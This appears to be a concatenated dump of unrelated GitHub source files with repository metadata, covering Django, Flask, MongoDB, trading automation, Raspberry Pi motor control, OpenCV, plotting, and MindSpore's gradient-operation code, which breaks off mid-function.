BackupLogAdmin)\n","repo_name":"LPgenerator/django-db-snapshot","sub_path":"dbsnapshot/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":4187,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"19"} +{"seq_id":"25417100294","text":"from angel_api import Angel\nimport datetime\nimport time\nimport os\nfrom django.core.wsgi import get_wsgi_application\nos.environ['DJANGO_SETTINGS_MODULE'] = 'TradeXpress.settings'\napplication = get_wsgi_application()\nfrom Intellitrade.models import *\n\ndef trail_sl(entry_price, ltp, sl, trade):\n if ltp >= entry_price + sl or trade.sl_to_entry:\n if not trade.sl_to_entry:\n trade.sl_to_entry = True\n trade.save()\n sl = 0\n return sl\n\ndef exitOrder():\n try:\n active_trades = TradeSignal.objects.filter(is_active=True)\n active_users = Trader.objects.filter(is_active=True)\n if active_users is not None and len(active_users) > 0:\n angel = Angel(active_users[0].email)\n if active_trades is not None and len(active_trades)>0:\n for trade in active_trades:\n symbol_token = trade.symbol_token\n ltp = angel.getLtp(symbol_token)\n entry_price = trade.entry_price\n sl = StopLoss.objects.get(nifty_symbol=trade.nifty_symbol).price\n target = Target.objects.get(nifty_symbol=trade.nifty_symbol).price\n # trail sl to entry if ltp is greater than entry by sl \n sl = trail_sl(entry_price, ltp, sl, trade)\n if ltp >= entry_price + target or ltp <= entry_price - sl:\n trade.exit_price = ltp\n trade.exit_datetime = datetime.datetime.now()\n trade.save()\n for user in active_users:\n angel = Angel(user.email, trade)\n angel.exitOrder(ltp)\n except Exception as e:\n pass\n\nif __name__ == '__main__':\n while True:\n exitOrder()\n time.sleep(1)\n","repo_name":"gummadidala/tradeserver","sub_path":"TradeXpress/exit_order.py","file_name":"exit_order.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18675820245","text":"from flask import Flask, request\nimport operations\n\napp = Flask(__name__)\n\n@app.route('/')\ndef hello_world():\n return \"Hello World\"\n\n@app.route('/sum', methods=['GET','POST'])\ndef sumCalculate():\n value_a=request.args.get('value_a')\n value_b=request.args.get('value_b')\n sum=operations.sum(value_a,value_b)\n return str(sum)\n\n@app.route('/queryparams',methods=['GET'])\ndef paramsDemo():\n name=request.args.get('name')\n return name\n\n@app.route('/postparams', methods=['POST'])\ndef postParamsDemo():\n params=request.json\n value_a=params[\"value_a\"]\n value_b=params[\"value_b\"]\n sum=operations.sum(value_a,value_b)\n return str(sum)\n\nif __name__=='__main__':\n app.run()","repo_name":"avirup171/Python-IoT","sub_path":"rest-api-server-flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25220770549","text":"#!/usr/bin/env python3\n'''Module.\n'''\n\n\ndef update_topics(mongo_collection, name, topics):\n '''Function that changes all topics of a collection's document based on\n the name.\n '''\n mongo_collection.update_many(\n {'name': name},\n {'$set': {'topics': topics}}\n )\n","repo_name":"MosesSoftEng/alx-backend-storage","sub_path":"0x01-NoSQL/10-update_topics.py","file_name":"10-update_topics.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"15159845054","text":"import requests\nimport json\n\n\ndef test_mikoservletpoc():\n url = 'http://miko3-aks-agic.miko2.co.in/mikoservletpoc/miko-servlet-poc/recommendation2'\n files = {'file': open('C://Users//basav//PycharmProjects//ApiIntegration_MIko//Testcases//test_miko-servlet-poc'\n '//servalet-poc data//withoutslot.txt', 'rb')}\n\n m = requests.get(url, files=files,)\n print(m.status_code)\n print(m.text)\n assert m.status_code == 200\n","repo_name":"basava761/miko_API","sub_path":"test_miko-servlet-poc/servalet-poc data/test_servaletpoc.py","file_name":"test_servaletpoc.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"31086721739","text":"from setuptools import find_packages\nfrom setuptools import setup\n\nwith open('README.md') as readme_file:\n readme = readme_file.read()\n\nrequirements = [\n 'Cython==0.29.13',\n 'Flask==1.1.1',\n 'flask-cors==3.0.8',\n 'gensim==3.8.0',\n 'lexrank==0.1.0',\n 'matplotlib==3.1.1',\n 'nltk==3.4.5',\n 'nose==1.3.7',\n 'numpy==1.17.2',\n 'pandas==0.25.1',\n 'scikit-learn==0.21.3',\n 'seaborn==0.9.0',\n 'spacy==2.1.8',\n 'swifter==0.295',\n 'tqdm==4.35.0',\n 'wheel'\n ]\n\n\nsetup(\n\n author=\"teddyauthors\",\n author_email='teddyauthors@gmail.com',\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'License :: OSI Approved :: Apache Software License',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 3.6',\n ],\n description=\"\",\n install_requires=requirements,\n license=\"Apache Software License 2.0\",\n long_description=readme + '\\n\\n',\n include_package_data=True,\n name='Teddy',\n packages=find_packages(),\n setup_requires=requirements,\n test_suite='tests',\n tests_require=requirements,\n version='0.1.0',\n zip_safe=False,\n)\n","repo_name":"megagonlabs/teddy","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"19"} +{"seq_id":"37694582919","text":"import time\nimport RPi.GPIO as GPIO\n\nGPIO.setmode(GPIO.BCM)\n\npin_coilA1 = 10\npin_coilA2 = 27\npin_coilB1 = 17\npin_coilB2 = 22\nLDR_PIN = 23\n\ndef motorSetup():\n GPIO.setup(pin_coilA1, GPIO.OUT)\n GPIO.setup(pin_coilA2, GPIO.OUT)\n GPIO.setup(pin_coilB1, GPIO.OUT)\n GPIO.setup(pin_coilB2, GPIO.OUT)\n\ndef motorFree():\n motorStep(0, 0, 0, 0)\n\ndef motorMove(steps, delay):\n if steps >= 0:\n for i in range(0, steps):\n motorStep(1, 0, 1, 0)\n time.sleep(delay)\n motorStep(0, 1, 1, 0)\n time.sleep(delay)\n motorStep(0, 1, 0, 1)\n time.sleep(delay)\n motorStep(1, 0, 0, 1)\n time.sleep(delay)\n else:\n for i in range(0, -steps):\n motorStep(1, 0, 1, 0)\n time.sleep(delay)\n motorStep(1, 0, 0, 1)\n time.sleep(delay)\n motorStep(0, 1, 0, 1)\n time.sleep(delay)\n motorStep(0, 1, 1, 0)\n time.sleep(delay)\n\ndef motorStep(a1, a2, b1, b2):\n GPIO.output(pin_coilA1, a1)\n GPIO.output(pin_coilA2, a2)\n GPIO.output(pin_coilB1, b1)\n GPIO.output(pin_coilB2, b2)\n\ndef ldr_value():\n value = 0\n GPIO.setup(LDR_PIN, GPIO.OUT)\n GPIO.setup(LDR_PIN, GPIO.LOW)\n time.sleep(0.1)\n start = time.time()\n GPIO.setup(LDR_PIN, GPIO.IN)\n while (GPIO.input(LDR_PIN) == GPIO.LOW):\n value += 1\n finish = time.time()\n duration = 1000 * (finish - start)\n return duration\n\nlightLevel = float(raw_input(\"Desired light level: \"))\n\nmotorSetup()\nmotorFree()\n\nmotorPosition = 64\n\ntry:\n while True:\n motorAdjust = 0\n ldr_val = ldr_value()\n print(\"LDR: %s\" % ldr_val)\n if ldr_val < lightLevel - 1:\n if motorPosition < 128:\n motorAdjust = 8\n motorPosition += motorAdjust\n print(\"Too bright, adjusting motor to %s\" % motorPosition)\n elif ldr_val > lightLevel + 1:\n if motorPosition > 0:\n motorAdjust = -8\n motorPosition += motorAdjust\n print(\"Too dim, adjusting motor to %s\" % motorPosition)\n else:\n print(\"Just right\")\n if motorAdjust == 0:\n time.sleep(0.25)\nexcept KeyboardInterrupt:\n pass\n\nGPIO.cleanup()\n\n","repo_name":"epic709/thinkerersA01","sub_path":"code/step_light.py","file_name":"step_light.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"43353476907","text":"from django.db import models\nfrom Accounts.models import User\nfrom os import path,remove\nfrom cloudX.settings import MEDIA_ROOT\nfrom cloudX.settings import domain\n\n_types = [\n ('sports','Sports'),\n ('tech','Technical'),\n ('cultural','Cultural'),\n ('other','Other'),\n]\n\n# Create your models here.\n\nclass Data(models.Model):\n title = models.CharField(max_length=225)\n user = models.ForeignKey(to = User,on_delete=models.CASCADE)\n description = models.TextField(null=True,blank=True)\n link = models.TextField(null=True,blank=True)\n type = models.CharField(max_length=10,choices=_types)\n file = models.FileField(upload_to='data/')\n date = models.DateField()\n \n def extension(self):\n name, extension = path.splitext(self.file.name)\n return extension\n \n def delete(self, *args, **kwargs):\n remove(path.join(MEDIA_ROOT, self.file.name))\n super(Data,self).delete(*args,**kwargs)\n","repo_name":"KhushalJangid/cloudX","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"72047330922","text":"#!/usr/bin/python3\n\nimport cv2\nimport numpy as np\n\ncap = cv2.VideoCapture(0)\nwhile cap.isOpened():\n\t_ , img = cap.read()\n\tgray = cv2.cvtColor(img , cv2.COLOR_BGR2GRAY)\n\n# LAPLACIAN 2nd argument is datatype 64 float , 3rd argument is kernel size , it is optional\n\tlap = cv2.Laplacian(gray , cv2.CV_64F , ksize=5)\n\t\n# SobelX 2nd arg is datatype 64 float 3rd is value of dx and 4th is dy\n\tsobelX = cv2.Sobel(gray , cv2.CV_64F , 1 ,0)\n\tsobelX = np.uint8(np.absolute(sobelX))\n\n# SObelY\n\tsobelY = cv2.Sobel(gray , cv2.CV_64F , 0 ,1)\n\tsobelY = np.uint8(np.absolute(sobelY))\n\n# Sobel Combined\n\tsobel_com = cv2.bitwise_or(sobelX ,sobelY)\n# Converting into Uint8\n\tlap = np.uint8(np.absolute(lap))\n\t\t\n\tcv2.imshow('laplacian', lap)\n\tcv2.imshow('SobelX', sobelX)\n\tcv2.imshow('Sobel_Y', sobelY)\n\tcv2.imshow('Sobel_Com', sobel_com)\n\tcv2.imshow('Gray', gray)\n#image = [img,dst,blur,gblur,median,bilateral]\n\tif cv2.waitKey(1) == ord('q'):\n\t\tbreak\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"crashoverloaded/Opencv_Days","sub_path":"Day5/image_gradients.py","file_name":"image_gradients.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"5447584398","text":"import matplotlib.pyplot as plt\r\nfrom mpl_toolkits.axes_grid1 import host_subplot\r\n\r\n# plot drawing & update\r\ndef draw_plot(data):\r\n\r\n print(type(data))\r\n for r in data:\r\n for k in r:\r\n print(k)\r\n\r\n plt.style.use('dark_background')\r\n\r\n host = host_subplot(111)\r\n\r\n par = host.twinx()\r\n\r\n host.set_ylabel(\"Temp.\", c=\"red\")\r\n par.set_ylabel(\"Pulse\", c=\"blue\")\r\n host.spines['left'].set_color(\"red\")\r\n par.spines['right'].set_color(\"blue\")\r\n\r\n y_temp = []\r\n y_pulse = []\r\n x = []\r\n x_ticks = []\r\n i = 0\r\n\r\n for r in data:\r\n print(r[5])\r\n y_temp.append(r[5])\r\n print(r[6])\r\n y_pulse.append(r[6])\r\n x.append(i)\r\n i += 1\r\n record = \"day \" + str(r[3]) + \", \" + str(r[2])\r\n x_ticks.append(record)\r\n\r\n plt.xticks(x, x_ticks, rotation=10)\r\n\r\n print(y_temp)\r\n print(y_pulse)\r\n p1 = host.scatter(x, y_temp, c=\"red\", label=\"Temp.\")\r\n p2 = par.scatter(x, y_pulse, c=\"blue\", label=\"Pulse\")\r\n\r\n return x_ticks\r\n\r\n","repo_name":"KonradHolewka/Hospi_App","sub_path":"plotdraw.py","file_name":"plotdraw.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"22684848844","text":"from __future__ import absolute_import\nfrom functools import partial\n\nfrom types import FunctionType, MethodType\nimport mindspore as ms\nfrom mindspore import context\nfrom mindspore.common.parameter import Parameter, ParameterTuple\nfrom mindspore.parallel._utils import _grads_divided_by_device_num_if_recomputation\nfrom mindspore._c_expression import GradOperation_, HyperMap_, Map_, MultitypeFuncGraph_, Tail_, \\\n TupleAdd_, UnpackCall_, ZipOperation_, ListAppend_, TupleGetItemTensor_, ListInsert_, \\\n SequenceSliceGetItem_, ListSliceSetItem_, VmapOperation_, TaylorOperation_, ListPop_, \\\n ListClear_, ListReverse_, ListExtend_, DictClear_, DictHasKey_, DictUpdate_, DictFromKeys_, \\\n ZerosLike_, TensorIndexGetitem_, TensorIndexSetitem_, ListAdd_\nfrom mindspore.common import dtype as mstype\nfrom mindspore.common.api import jit, _pynative_executor, _wrap_func\nfrom mindspore.common.api import _add_flags, _core\nfrom mindspore.ops.primitive import Primitive\nfrom mindspore.ops import signature as sig\n\n__all__ = [TupleAdd_, ListAdd_, UnpackCall_, TupleGetItemTensor_, SequenceSliceGetItem_,\n ListSliceSetItem_, ZerosLike_, TensorIndexGetitem_, TensorIndexSetitem_]\n\n\ndef add_flags(fn=None, **flags):\n \"\"\"\n A decorator that adds a flag to the function.\n\n Note:\n Only supports bool value.\n\n Args:\n fn (Function): Function or cell to add flag. Default: ``None`` .\n flags (dict): Flags use kwargs. Default: ``None`` .\n\n Returns:\n Function, the function with added flags.\n\n Examples:\n >>> net = Net();\n >>> net = add_flags(net, predit=True)\n >>> print(hasattr(net, '_func_graph_flags'))\n True\n \"\"\"\n\n return _add_flags(fn, **flags)\n\n\ndef core(fn=None, **flags):\n \"\"\"\n A decorator that adds a flag to the function.\n\n By default, the function is marked as True, enabling to use this decorator to\n set flag to a graph.\n\n Args:\n fn (Function, optional): Function to add flag. Default: ``None`` .\n flags (dict, optional): The following flags can be set core, which indicates that this is a core function or\n other flag. Default: ``None`` .\n\n Supported Platforms:\n ``Ascend`` ``GPU`` ``CPU``\n\n Examples:\n >>> net = Net()\n >>> net = core(net, predit=True)\n >>> print(hasattr(net, '_func_graph_flags'))\n True\n \"\"\"\n\n return _core(fn, **flags)\n\n\ndef _get_grad_weights_id(weights=None):\n \"\"\"generate id of parameters\"\"\"\n res = \"\"\n if isinstance(weights, Parameter):\n res = weights.name + str(weights.requires_grad)\n if isinstance(weights, ParameterTuple):\n res = ''.join(item.name + str(item.requires_grad) for item in weights)\n if isinstance(weights, list):\n res = ''.join(item.name + str(item.requires_grad) for item in weights if isinstance(item, Parameter))\n return res\n\n\nclass GradOperation(GradOperation_):\n \"\"\"\n A higher-order function which is used to generate the gradient function for the input function.\n\n The gradient function generated by `GradOperation` higher-order function can be customized by\n construction arguments.\n\n For example, given an input function `net = Net()` that takes `x` and `y` as inputs, and has a parameter `z`,\n see `Net` in Examples.\n\n - Used to get the derivative of the input:\n\n 1. Returns gradients with respect to the first input (see `GradNetWrtX` in Examples).\n\n 1) Construct a `GradOperation` higher-order function with default arguments: `grad_op = GradOperation()`.\n\n 2) Call it with input function as argument to get the gradient function: `gradient_function = grad_op(net)`.\n\n 3) Call the gradient function with input function's inputs to get the gradients with respect to the first\n input: `grad_op(net)(x, y)`.\n\n 2. Returns gradients with respect to all inputs (see `GradNetWrtXY` in Examples).\n\n 1) Construct a `GradOperation` higher-order function with `get_all=True` which indicates getting gradients\n with respect to all inputs, they are `x` and `y` in example function `Net()`:\n `grad_op = GradOperation(get_all=True)`.\n\n 2) Call it with input function as argument to get the gradient function: `gradient_function = grad_op(net)`.\n\n 3) Call the gradient function with input function's inputs to get the gradients with respect to all inputs:\n `gradient_function(x, y)`.\n\n - Used to get the derivative of the parameters:\n\n Returns gradients with respect to given parameters (see `GradNetWithWrtParams` in Examples).\n\n 1. Construct a `GradOperation` higher-order function with `get_by_list=True`:\n `grad_op = GradOperation(get_by_list=True)`.\n\n 2. Construct a `ParameterTuple` that will be passed to the input function when constructing\n `GradOperation` higher-order function, it will be used as a parameter filter that determine\n which gradient to return: `params = ParameterTuple(net.trainable_params())`.\n\n 3. Call it with input function and `params` as arguments to get the gradient function:\n `gradient_function = grad_op(net, params)`.\n\n 4. Call the gradient function with input function's inputs to get the gradients with\n respect to given parameters: `gradient_function(x, y)`.\n\n - Used to get the derivative of the inputs and parameters at the same time:\n Returns gradients with respect to all inputs and given parameters in the format of ((dx, dy), (dz))\n (see `GradNetWrtInputsAndParams` in Examples).\n\n 1. Construct a `GradOperation` higher-order function with `get_all=True` and `get_by_list=True`:\n `grad_op = GradOperation(get_all=True, get_by_list=True)`.\n\n 2. Construct a `ParameterTuple` that will be passed along input function when constructing\n `GradOperation` higher-order function: `params = ParameterTuple(net.trainable_params())`.\n\n 3. Call it with input function and `params` as arguments to get the gradient function:\n `gradient_function = grad_op(net, params)`.\n\n 4. Call the gradient function with input function's inputs to get the gradients with respect to\n all inputs and given parameters: `gradient_function(x, y)`.\n\n - We can configure the sensitivity(gradient with respect to output) by setting `sens_param` as True and\n passing an extra sensitivity input to the gradient function, the sensitivity input should has the\n same shape and type with input function's output(see `GradNetWrtXYWithSensParam` in Examples).\n\n 1. Construct a `GradOperation` higher-order function with `get_all=True` and `sens_param=True`:\n `grad_op = GradOperation(get_all=True, sens_param=True)`.\n\n 2. Define `grad_wrt_output` as `sens_param` which works as the gradient with respect to output:\n `grad_wrt_output = Tensor(np.ones([2, 2]).astype(np.float32))`.\n\n 3. Call it with input function as argument to get the gradient function: `gradient_function = grad_op(net)`.\n\n 4. Call the gradient function with input function's inputs and `sens_param` to\n get the gradients with respect to all inputs: `gradient_function(x, y, grad_wrt_output)`.\n\n Note:\n For above gradient functions, the returned gradient result may vary for grad result element number:\n\n - Return a single value if only one result.\n - Return a tuple for multiple results.\n - Return an empty tuple for no result.\n\n Args:\n get_all (bool): If ``True`` , get all the gradients with respect to inputs. Default: ``False`` .\n get_by_list (bool): If ``True`` , get all the gradients with respect to Parameter free variables.\n If get_all and get_by_list are both ``False`` , get the gradient with respect to first input.\n If get_all and get_by_list are both ``True`` , get the gradients with respect to inputs and\n Parameter free variables at the same time in the form of (\"gradients with respect to inputs\",\n \"gradients with respect to parameter free variables\"). Default: ``False`` .\n sens_param (bool): Whether to append sensitivity (gradient with respect to output) as input.\n If sens_param is ``False`` , a 'ones_like(outputs)' sensitivity will be attached automatically.\n Default: ``False`` .\n If the sensor_param is ``True`` , a sensitivity (gradient with respect to output) needs to be transferred\n through the location parameter or key-value pair parameter. If the value is transferred through\n the key-value pair parameter, the key must be sens.\n\n Returns:\n The higher-order function which takes a function as argument and returns gradient function for it.\n\n Raises:\n TypeError: If `get_all`, `get_by_list` or `sens_param` is not a bool.\n\n Supported Platforms:\n ``Ascend`` ``GPU`` ``CPU``\n\n Examples:\n >>> import mindspore\n >>> import numpy as np\n >>> from mindspore import dtype as mstype\n >>> from mindspore import Tensor, ops, nn, Parameter\n >>> class Net(nn.Cell):\n ... def __init__(self):\n ... super(Net, self).__init__()\n ... self.matmul = ops.MatMul()\n ... self.z = Parameter(Tensor(np.array([1.0], np.float32)), name='z')\n ... def construct(self, x, y):\n ... x = x * self.z\n ... out = self.matmul(x, y)\n ... return out\n ...\n >>> class GradNetWrtX(nn.Cell):\n ... def __init__(self, net):\n ... super(GradNetWrtX, self).__init__()\n ... self.net = net\n ... self.grad_op = ops.GradOperation()\n ... def construct(self, x, y):\n ... gradient_function = self.grad_op(self.net)\n ... return gradient_function(x, y)\n ...\n >>> x = Tensor([[0.5, 0.6, 0.4], [1.2, 1.3, 1.1]], dtype=mstype.float32)\n >>> y = Tensor([[0.01, 0.3, 1.1], [0.1, 0.2, 1.3], [2.1, 1.2, 3.3]], dtype=mstype.float32)\n >>> output = GradNetWrtX(Net())(x, y)\n >>> print(output)\n [[1.4100001 1.5999999 6.6 ]\n [1.4100001 1.5999999 6.6 ]]\n >>>\n >>> class GradNetWrtXY(nn.Cell):\n ... def __init__(self, net):\n ... super(GradNetWrtXY, self).__init__()\n ... self.net = net\n ... self.grad_op = ops.GradOperation(get_all=True)\n ... def construct(self, x, y):\n ... gradient_function = self.grad_op(self.net)\n ... return gradient_function(x, y)\n >>>\n >>> x = Tensor([[0.8, 0.6, 0.2], [1.8, 1.3, 1.1]], dtype=mstype.float32)\n >>> y = Tensor([[0.1, 3.3, 1.1], [1.1, 0.2, 1.4], [1.1, 2.2, 0.3]], dtype=mstype.float32)\n >>> output = GradNetWrtXY(Net())(x, y)\n >>> print(output)\n (Tensor(shape=[2, 3], dtype=Float32, value=\n [[ 4.50000000e+00, 2.70000005e+00, 3.60000014e+00],\n [ 4.50000000e+00, 2.70000005e+00, 3.60000014e+00]]), Tensor(shape=[3, 3], dtype=Float32, value=\n [[ 2.59999990e+00, 2.59999990e+00, 2.59999990e+00],\n [ 1.89999998e+00, 1.89999998e+00, 1.89999998e+00],\n [ 1.30000007e+00, 1.30000007e+00, 1.30000007e+00]]))\n >>>\n >>> class GradNetWrtXYWithSensParam(nn.Cell):\n ... def __init__(self, net):\n ... super(GradNetWrtXYWithSensParam, self).__init__()\n ... self.net = net\n ... self.grad_op = ops.GradOperation(get_all=True, sens_param=True)\n ... self.grad_wrt_output = Tensor([[0.1, 0.6, 0.2], [0.8, 1.3, 1.1]], dtype=mstype.float32)\n ... def construct(self, x, y):\n ... gradient_function = self.grad_op(self.net)\n ... return gradient_function(x, y, self.grad_wrt_output)\n >>>\n >>> x = Tensor([[0.8, 0.6, 0.2], [1.8, 1.3, 1.1]], dtype=mstype.float32)\n >>> y = Tensor([[0.11, 3.3, 1.1], [1.1, 0.2, 1.4], [1.1, 2.2, 0.3]], dtype=mstype.float32)\n >>> output = GradNetWrtXYWithSensParam(Net())(x, y)\n >>> print(output)\n (Tensor(shape=[2, 3], dtype=Float32, value=\n [[ 2.21099997e+00, 5.09999990e-01, 1.49000001e+00],\n [ 5.58800030e+00, 2.68000007e+00, 4.07000017e+00]]), Tensor(shape=[3, 3], dtype=Float32, value=\n [[ 1.51999998e+00, 2.81999993e+00, 2.14000010e+00],\n [ 1.09999990e+00, 2.04999995e+00, 1.54999995e+00],\n [ 9.00000036e-01, 1.54999995e+00, 1.25000000e+00]]))\n >>>\n >>> class GradNetWithWrtParams(nn.Cell):\n ... def __init__(self, net):\n ... super(GradNetWithWrtParams, self).__init__()\n ... self.net = net\n ... self.params = ParameterTuple(net.trainable_params())\n ... self.grad_op = ops.GradOperation(get_by_list=True)\n ... def construct(self, x, y):\n ... gradient_function = self.grad_op(self.net, self.params)\n ... return gradient_function(x, y)\n >>>\n >>> x = Tensor([[0.8, 0.6, 0.2], [1.8, 1.3, 1.1]], dtype=mstype.float32)\n >>> y = Tensor([[0.11, 3.3, 1.1], [1.1, 0.2, 1.4], [1.1, 2.2, 0.3]], dtype=mstype.float32)\n >>> output = GradNetWithWrtParams(Net())(x, y)\n >>> print(output)\n (Tensor(shape=[1], dtype=Float32, value= [ 2.15359993e+01]),)\n >>>\n >>> class GradNetWrtInputsAndParams(nn.Cell):\n ... def __init__(self, net):\n ... super(GradNetWrtInputsAndParams, self).__init__()\n ... self.net = net\n ... self.params = ParameterTuple(net.trainable_params())\n ... self.grad_op = ops.GradOperation(get_all=True, get_by_list=True)\n ... def construct(self, x, y):\n ... gradient_function = self.grad_op(self.net, self.params)\n ... return gradient_function(x, y)\n >>>\n >>> x = Tensor([[0.1, 0.6, 1.2], [0.5, 1.3, 0.1]], dtype=mstype.float32)\n >>> y = Tensor([[0.12, 2.3, 1.1], [1.3, 0.2, 2.4], [0.1, 2.2, 0.3]], dtype=mstype.float32)\n >>> output = GradNetWrtInputsAndParams(Net())(x, y)\n >>> print(output)\n ((Tensor(shape=[2, 3], dtype=Float32, value=\n [[ 3.51999998e+00, 3.90000010e+00, 2.59999990e+00],\n [ 3.51999998e+00, 3.90000010e+00, 2.59999990e+00]]), Tensor(shape=[3, 3], dtype=Float32, value=\n [[ 6.00000024e-01, 6.00000024e-01, 6.00000024e-01],\n [ 1.89999998e+00, 1.89999998e+00, 1.89999998e+00],\n [ 1.30000007e+00, 1.30000007e+00, 1.30000007e+00]])), (Tensor(shape=[1], dtype=Float32, value=\n [ 1.29020004e+01]),))\n \"\"\"\n\n def __init__(self, get_all=False, get_by_list=False, sens_param=False):\n \"\"\"Initialize GradOperation.\"\"\"\n if not isinstance(get_all, bool):\n raise TypeError(f\"For 'GradOperation', the 'get_all' should be bool, but got {type(get_all).__name__}\")\n if not isinstance(get_by_list, bool):\n raise TypeError(f\"For 'GradOperation', the 'get_by_list' should be bool, \"\n f\"but got {type(get_by_list).__name__}\")\n if not isinstance(sens_param, bool):\n raise TypeError(f\"For 'GradOperation', the 'sens_param' should be bool, \"\n f\"but got {type(sens_param).__name__}\")\n self.get_all = get_all\n self.get_by_list = get_by_list\n self.sens_param = sens_param\n GradOperation_.__init__(self, 'grad', get_all, get_by_list, sens_param, False, False, False, False)\n self.grad_fn = None\n self.fn = None\n self.weights_id = None\n self.pynative_ = False\n self.grad_position = (0,)\n\n def __call__(self, fn, weights=None):\n weights_id = _get_grad_weights_id(weights)\n if self.grad_fn is not None and self.fn == fn and self.weights_id == weights_id:\n return self.grad_fn\n grad_ = GradOperation(self.get_all, self.get_by_list, self.sens_param)\n # If calling Grad in GRAPH_MODE or calling Grad in functions decorated with 'jit', do grad in GRAPH_MODE\n # If calling Grad in pure PYNATIVE_MODE do grad in PYNATIVE_MODE\n # In pure PYNATIVE_MODE the out layer after_grad just used to set pynative flag for inner GradOperation.\n # In PYNATIVE_MODE calling Grad from functions decorated with 'jit', use the out layer after_grad do\n # grad in GRAPH_MODE.\n if context.get_context(\"mode\") == context.GRAPH_MODE:\n dynamic_shape_inputs = None\n if isinstance(fn, ms.nn.Cell):\n dynamic_shape_inputs = fn.get_inputs()\n fn.grad_ops_label = True\n if self.get_by_list:\n @jit(input_signature=dynamic_shape_inputs)\n def after_grad(*args, **kwargs):\n return grad_(fn, weights)(*args, **kwargs)\n else:\n @jit(input_signature=dynamic_shape_inputs)\n def after_grad(*args, **kwargs):\n return grad_(fn)(*args, **kwargs)\n elif self.pynative_:\n if not _pynative_executor.enable_grad():\n raise RuntimeError(\"In no_grad context, you can not calculate gradient\")\n\n @_wrap_func\n def after_grad(*args, **kwargs):\n self._pynative_forward_run(fn, grad_, weights, args, kwargs)\n _pynative_executor.grad(fn, grad_, weights, self.grad_position, *args, **kwargs)\n out = _pynative_executor()\n out = _grads_divided_by_device_num_if_recomputation(out)\n return out\n else:\n grad_.pynative_ = True\n if not _pynative_executor.enable_grad():\n raise RuntimeError(\"In no_grad context, you can not calculate gradient\")\n # after_grad of this branch can't use @jit, just directly call grad_\n if self.get_by_list:\n def after_grad(*args, **kwargs):\n return grad_(fn, weights)(*args, **kwargs)\n else:\n def after_grad(*args, **kwargs):\n return grad_(fn)(*args, **kwargs)\n\n self.grad_fn = after_grad\n self.fn = fn\n self.weights_id = weights_id\n return self.grad_fn\n\n def _pynative_forward_run(self, fn, grad, weights, args, kwargs):\n \"\"\" Pynative forward run to build grad graph. \"\"\"\n new_kwargs = kwargs\n if self.sens_param:\n if 'sens' not in kwargs.keys():\n args = args[:-1]\n else:\n new_kwargs = kwargs.copy()\n new_kwargs.pop('sens')\n if isinstance(fn, (FunctionType, MethodType)):\n if not _pynative_executor.check_run(grad, fn, weights, None, *args, **new_kwargs):\n _pynative_executor.set_grad_flag(True)\n _pynative_executor.new_graph(fn, *args, **new_kwargs)\n output = fn(*args, **new_kwargs)\n _pynative_executor.end_graph(fn, output, *args, **new_kwargs)\n else:\n # Check if fn have run already\n if not _pynative_executor.check_run(grad, fn, weights, None, *args, **new_kwargs):\n fn.set_grad()\n fn(*args, **new_kwargs)\n fn.set_grad(False)\n\n\nclass _TaylorOperation(TaylorOperation_):\n \"\"\"\n Generate the higher order derivatives function for the input function.\n \"\"\"\n\n def __init__(self):\n \"\"\"Initialize TaylorOperation.\"\"\"\n TaylorOperation_.__init__(self, 'taylorgrad')\n self.grad_fn = None\n self.fn = None\n\n def __call__(self, fn):\n if self.grad_fn is not None and self.fn == fn:\n return self.grad_fn\n taylor_grad_ = _TaylorOperation()\n\n # If calling Grad in GRAPH_MODE or calling Grad in functions decorated with 'jit', do grad in GRAPH_MODE\n\n @jit\n def after_taylor_grad(*args):\n return taylor_grad_(fn)(*args)\n\n self.grad_fn = after_taylor_grad\n self.fn = fn\n return self.grad_fn\n\n\ndef _combine_weight(grad_position, weights, out, out_with_ids):\n \"\"\" Making resulting tuple for weight, when return_ids is set to True. \"\"\"\n weight_tuple = []\n position = 0\n if isinstance(weights, (list, ParameterTuple, tuple)) and grad_position:\n for weight in weights:\n weight_tuple.append((weight.name, out[1][position]))\n position += 1\n elif isinstance(weights, (list, ParameterTuple, tuple)):\n for weight in weights:\n weight_tuple.append((weight.name, out[position]))\n position += 1\n elif grad_position:\n weight_tuple.append(weights.name)\n weight_tuple.append(out[1])\n else:\n weight_tuple.append(weights.name)\n weight_tuple.append(out)\n if grad_position:\n out_with_ids.append(tuple(weight_tuple))\n else:\n out_with_ids = weight_tuple\n return out_with_ids\n\n\ndef _combine_position(grad_position, weights, out, out_with_ids):\n \"\"\" Making resulting tuple for position, when return_ids is set to True. \"\"\"\n position_tuple = []\n position = 0\n if grad_position == (0,) and weights is not None:\n position_tuple.append(0)\n position_tuple.append(out[0])\n elif grad_position == (0,):\n position_tuple.append(0)\n position_tuple.append(out)\n elif weights is not None:\n for index in grad_position:\n position_tuple.append((index, out[0][position]))\n position += 1\n else:\n for index in grad_position:\n position_tuple.append((index, out[position]))\n position += 1\n if weights:\n out_with_ids.append(tuple(position_tuple))\n else:\n out_with_ids = 